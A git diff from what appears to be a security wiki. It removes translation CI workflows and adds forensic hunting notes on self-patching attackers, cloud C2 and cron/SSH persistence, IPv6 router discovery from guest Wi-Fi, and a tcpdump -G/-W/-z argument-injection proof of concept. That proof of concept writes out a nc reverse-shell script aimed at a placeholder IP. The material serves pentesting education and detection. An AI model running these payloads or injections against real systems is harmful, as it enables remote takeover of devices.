echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to PL (Polish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: pl
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Polish
BRANCH: pl
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to PT (Portuguese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: pt
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Portuguese
BRANCH: pt
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to SR (Serbian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: sr
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Serbian
BRANCH: sr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to SW (Swahili)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: sw
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Swahili
BRANCH: sw
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to TR (Turkish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: tr
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Turkish
BRANCH: tr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to UK (Ukranian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: uk
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Ukranian
BRANCH: uk
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to ZH (Chinese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: zh
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Chinese
BRANCH: zh
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -327,6 +327,7 @@
- [Android APK Checklist](mobile-pentesting/android-checklist.md)
- [Android Applications Pentesting](mobile-pentesting/android-app-pentesting/README.md)
- [Accessibility Services Abuse](mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md)
- [Android Anti Instrumentation And Ssl Pinning Bypass](mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md)
- [Android Applications Basics](mobile-pentesting/android-app-pentesting/android-applications-basics.md)
- [Android Task Hijacking](mobile-pentesting/android-app-pentesting/android-task-hijacking.md)
- [ADB Commands](mobile-pentesting/android-app-pentesting/adb-commands.md)

View File

@ -2,15 +2,23 @@
{{#include ../../banners/hacktricks-training.md}}
## [**Shells - Linux**](linux.md)
## [Shells - Linux](linux.md)
## [**Shells - Windows**](windows.md)
---
## [**MSFVenom - CheatSheet**](msfvenom.md)
## [Shells - Windows](windows.md)
## [**Full TTYs**](full-ttys.md)
---
## **Auto-generated shells**
## [MSFVenom - CheatSheet](msfvenom.md)
---
## [Full TTYs](full-ttys.md)
---
## Auto-generated shells
- [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
- [**https://www.revshells.com/**](https://www.revshells.com/)

View File

@ -226,6 +226,81 @@ and alert on kernel-service creation from user-writable paths.
---
## Linux Anti-Forensics: Self-Patching and Cloud C2 (20232025)
### Selfpatching compromised services to reduce detection (Linux)
Adversaries increasingly “selfpatch” a service right after exploiting it to both prevent reexploitation and suppress vulnerabilitybased detections. The idea is to replace vulnerable components with the latest legitimate upstream binaries/JARs, so scanners report the host as patched while persistence and C2 remain.
Example: Apache ActiveMQ OpenWire RCE (CVE202346604)
- Postexploitation, attackers fetched legitimate JARs from Maven Central (repo1.maven.org), deleted vulnerable JARs in the ActiveMQ install, and restarted the broker.
- This closed the initial RCE while maintaining other footholds (cron, SSH config changes, separate C2 implants).
Operational example (illustrative)
```bash
# ActiveMQ install root (adjust as needed)
AMQ_DIR=/opt/activemq
cd "$AMQ_DIR"/lib
# Fetch patched JARs from Maven Central (versions as appropriate)
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-client/5.18.3/activemq-client-5.18.3.jar
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-openwire-legacy/5.18.3/activemq-openwire-legacy-5.18.3.jar
# Remove vulnerable files and ensure the service uses the patched ones
rm -f activemq-client-5.18.2.jar activemq-openwire-legacy-5.18.2.jar || true
ln -sf activemq-client-5.18.3.jar activemq-client.jar
ln -sf activemq-openwire-legacy-5.18.3.jar activemq-openwire-legacy.jar
# Apply changes without removing persistence
systemctl restart activemq || service activemq restart
```
Forensic/hunting tips
- Review service directories for unscheduled binary/JAR replacements:
- Debian/Ubuntu: `dpkg -V activemq` and compare file hashes/paths with repo mirrors.
- RHEL/CentOS: `rpm -Va 'activemq*'`
- Look for JAR versions present on disk that are not owned by the package manager, or symbolic links updated out of band.
- Timeline: `find "$AMQ_DIR" -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort` to correlate ctime/mtime with compromise window.
- Shell history/process telemetry: evidence of `curl`/`wget` to `repo1.maven.org` or other artifact CDNs immediately after initial exploitation.
- Change management: validate who applied the “patch” and why, not only that a patched version is present.
### Cloudservice C2 with bearer tokens and antianalysis stagers
Observed tradecraft combined multiple longhaul C2 paths and antianalysis packaging:
- Passwordprotected PyInstaller ELF loaders to hinder sandboxing and static analysis (e.g., encrypted PYZ, temporary extraction under `/_MEI*`).
- Indicators: `strings` hits such as `PyInstaller`, `pyi-archive`, `PYZ-00.pyz`, `MEIPASS`.
- Runtime artifacts: extraction to `/tmp/_MEI*` or custom `--runtime-tmpdir` paths.
- Dropboxbacked C2 using hardcoded OAuth Bearer tokens
- Network markers: `api.dropboxapi.com` / `content.dropboxapi.com` with `Authorization: Bearer <token>`.
- Hunt in proxy/NetFlow/Zeek/Suricata for outbound HTTPS to Dropbox domains from server workloads that do not normally sync files.
- Parallel/backup C2 via tunneling (e.g., Cloudflare Tunnel `cloudflared`), keeping control if one channel is blocked.
- Host IOCs: `cloudflared` processes/units, config at `~/.cloudflared/*.json`, outbound 443 to Cloudflare edges.
### Persistence and “hardening rollback” to maintain access (Linux examples)
Attackers frequently pair selfpatching with durable access paths:
- Cron/Anacron: edits to the `0anacron` stub in each `/etc/cron.*/` directory for periodic execution.
- Hunt:
```bash
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
grep -R --line-number -E 'curl|wget|python|/bin/sh' /etc/cron.*/* 2>/dev/null
```
- SSH configuration hardening rollback: enabling root logins and altering default shells for lowprivileged accounts.
- Hunt for root login enablement:
```bash
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# flag values like "yes" or overly permissive settings
```
- Hunt for suspicious interactive shells on system accounts (e.g., `games`):
```bash
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
```
- Random, shortnamed beacon artifacts (8 alphabetical chars) dropped to disk that also contact cloud C2:
- Hunt:
```bash
find / -maxdepth 3 -type f -regextype posix-extended -regex '.*/[A-Za-z]{8}$' \
-exec stat -c '%n %s %y' {} \; 2>/dev/null | sort
```
Defenders should correlate these artifacts with external exposure and service patching events to uncover antiforensic selfremediation used to hide initial exploitation.
## References
- Sophos X-Ops “AuKill: A Weaponized Vulnerable Driver for Disabling EDR” (March 2023)
@ -233,6 +308,9 @@ and alert on kernel-service creation from user-writable paths.
- Red Canary “Patching EtwEventWrite for Stealth: Detection & Hunting” (June 2024)
https://redcanary.com/blog/etw-patching-detection
- [Red Canary Patching for persistence: How DripDropper Linux malware moves through the cloud](https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/)
- [CVE202346604 Apache ActiveMQ OpenWire RCE (NVD)](https://nvd.nist.gov/vuln/detail/CVE-2023-46604)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -213,6 +213,38 @@ cat /var/spool/cron/crontabs/* \
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
#### Hunt: Cron/Anacron abuse via 0anacron and suspicious stubs
Attackers often edit the 0anacron stub present under each /etc/cron.*/ directory to ensure periodic execution.
```bash
# List 0anacron files and their timestamps/sizes
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
# Look for obvious execution of shells or downloaders embedded in cron stubs
grep -R --line-number -E 'curl|wget|/bin/sh|python|bash -c' /etc/cron.*/* 2>/dev/null
```
#### Hunt: SSH hardening rollback and backdoor shells
Changes to sshd_config and system account shells are common postexploitation to preserve access.
```bash
# Root login enablement (flag "yes" or lax values)
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# System accounts with interactive shells (e.g., games → /bin/sh)
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
```
#### Hunt: Cloud C2 markers (Dropbox/Cloudflare Tunnel)
- Dropbox API beacons typically use api.dropboxapi.com or content.dropboxapi.com over HTTPS with Authorization: Bearer tokens.
- Hunt in proxy/Zeek/NetFlow for unexpected Dropbox egress from servers.
- Cloudflare Tunnel (`cloudflared`) provides backup C2 over outbound 443.
```bash
ps aux | grep -E '[c]loudflared|trycloudflare'
systemctl list-units | grep -i cloudflared
```
### Services
Paths where a malware could be installed as a service:
@ -396,6 +428,8 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
- [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
- **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
- [Red Canary Patching for persistence: How DripDropper Linux malware moves through the cloud](https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -280,11 +280,12 @@ from scapy.all import *
import argparse
p = argparse.ArgumentParser()
p.add_argument('-i','--interface',required=True)
p.add_argument('--llip',required=True)
p.add_argument('--dns',required=True,help='Fake DNS IPv6')
p.add_argument('--lifetime',type=int,default=600)
p.add_argument('--interval',type=int,default=5)
P = p.add_argument
P('-i','--interface',required=True)
P('--llip',required=True)
P('--dns',required=True,help='Fake DNS IPv6')
P('--lifetime',type=int,default=600)
P('--interval',type=int,default=5)
args = p.parse_args()
ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
@ -317,6 +318,58 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning
* Disabling IPv6 on endpoints is a temporary workaround that often breaks modern services and hides blind spots prefer L2 filtering instead.
### NDP Router Discovery on Guest/Public SSIDs and Management Service Exposure
Many consumer routers expose management daemons (HTTP(S), SSH/Telnet, TR-069, etc.) on all interfaces. In some deployments, the “guest/public” SSID is bridged to the WAN/core and is IPv6-only. Even if the routers IPv6 changes on every boot, you can reliably learn it using NDP/ICMPv6 and then direct-connect to the management plane from the guest SSID.
Typical workflow from a client connected to the guest/public SSID:
1) Discover the router via ICMPv6 Router Solicitation to the All-Routers multicast `ff02::2` and capture the Router Advertisement (RA):
```bash
# Listen for Router Advertisements (ICMPv6 type 134)
sudo tcpdump -vvv -i <IFACE> 'icmp6 and ip6[40]==134'
# Provoke an RA by sending a Router Solicitation to ff02::2
python3 - <<'PY'
from scapy.all import *
send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='<IFACE>')
PY
```
The RA reveals the routers link-local and often a global address/prefix. If only a link-local is known, remember that connections must specify the zone index, e.g. `ssh -6 admin@[fe80::1%wlan0]`.
Alternative: use ndisc6 suite if available:
```bash
# rdisc6 sends RS and prints RAs in a friendly way
rdisc6 <IFACE>
```
2) Reach exposed services over IPv6 from the guest SSID:
```bash
# SSH/Telnet example (replace with discovered address)
ssh -6 admin@[2001:db8:abcd::1]
# Web UI over IPv6
curl -g -6 -k 'http://[2001:db8:abcd::1]/'
# Fast IPv6 service sweep
nmap -6 -sS -Pn -p 22,23,80,443,7547 [2001:db8:abcd::1]
```
3) If the management shell provides packet-capture tooling via a wrapper (e.g., tcpdump), check for argument/filename injection that allows passing extra tcpdump flags like `-G/-W/-z` to achieve post-rotate command execution. See:
{{#ref}}
../../linux-hardening/privilege-escalation/wildcards-spare-tricks.md
{{#endref}}
Defences/notes:
- Dont bind management to guest/public bridges; apply IPv6 firewalls on SSID bridges.
- Rate-limit and filter NDP/RS/RA on guest segments where feasible.
- For services that must be reachable, enforce authN/MFA and strong rate-limits.
## References
@ -326,7 +379,6 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning
- [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
- [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
- [Practical Guide to IPv6 Attacks in a Local Network](https://habr.com/ru/articles/930526/)
- [FiberGateway GR241AG Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -120,6 +120,52 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che
---
## tcpdump rotation hooks (-G/-W/-z): RCE via argv injection in wrappers
When a restricted shell or vendor wrapper builds a `tcpdump` command line by concatenating user-controlled fields (e.g., a "file name" parameter) without strict quoting/validation, you can smuggle extra `tcpdump` flags. The combo of `-G` (time-based rotation), `-W` (limit number of files), and `-z <cmd>` (post-rotate command) yields arbitrary command execution as the user running tcpdump (often root on appliances).
Preconditions:
- You can influence `argv` passed to `tcpdump` (e.g., via a wrapper like `/debug/tcpdump --filter=... --file-name=<HERE>`).
- The wrapper does not sanitize spaces or `-`-prefixed tokens in the file name field.
Classic PoC (executes a reverse shell script from a writable path):
```sh
# Reverse shell payload saved on the device (e.g., USB, tmpfs)
cat > /mnt/disk1_1/rce.sh <<'EOF'
#!/bin/sh
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f
EOF
chmod +x /mnt/disk1_1/rce.sh
# Inject additional tcpdump flags via the unsafe "file name" field
/debug/tcpdump --filter="udp port 1234" \
--file-name="test -i any -W 1 -G 1 -z /mnt/disk1_1/rce.sh"
# On the attacker host
nc -6 -lvnp 4444 &
# Then send any packet that matches the BPF to force a rotation
printf x | nc -u -6 [victim_ipv6] 1234
```
Details:
- `-G 1 -W 1` forces an immediate rotate after the first matching packet.
- `-z <cmd>` runs the post-rotate command once per rotation. Many builds execute `<cmd> <savefile>`. If `<cmd>` is a script/interpreter, ensure the argument handling matches your payload.
No-removable-media variants:
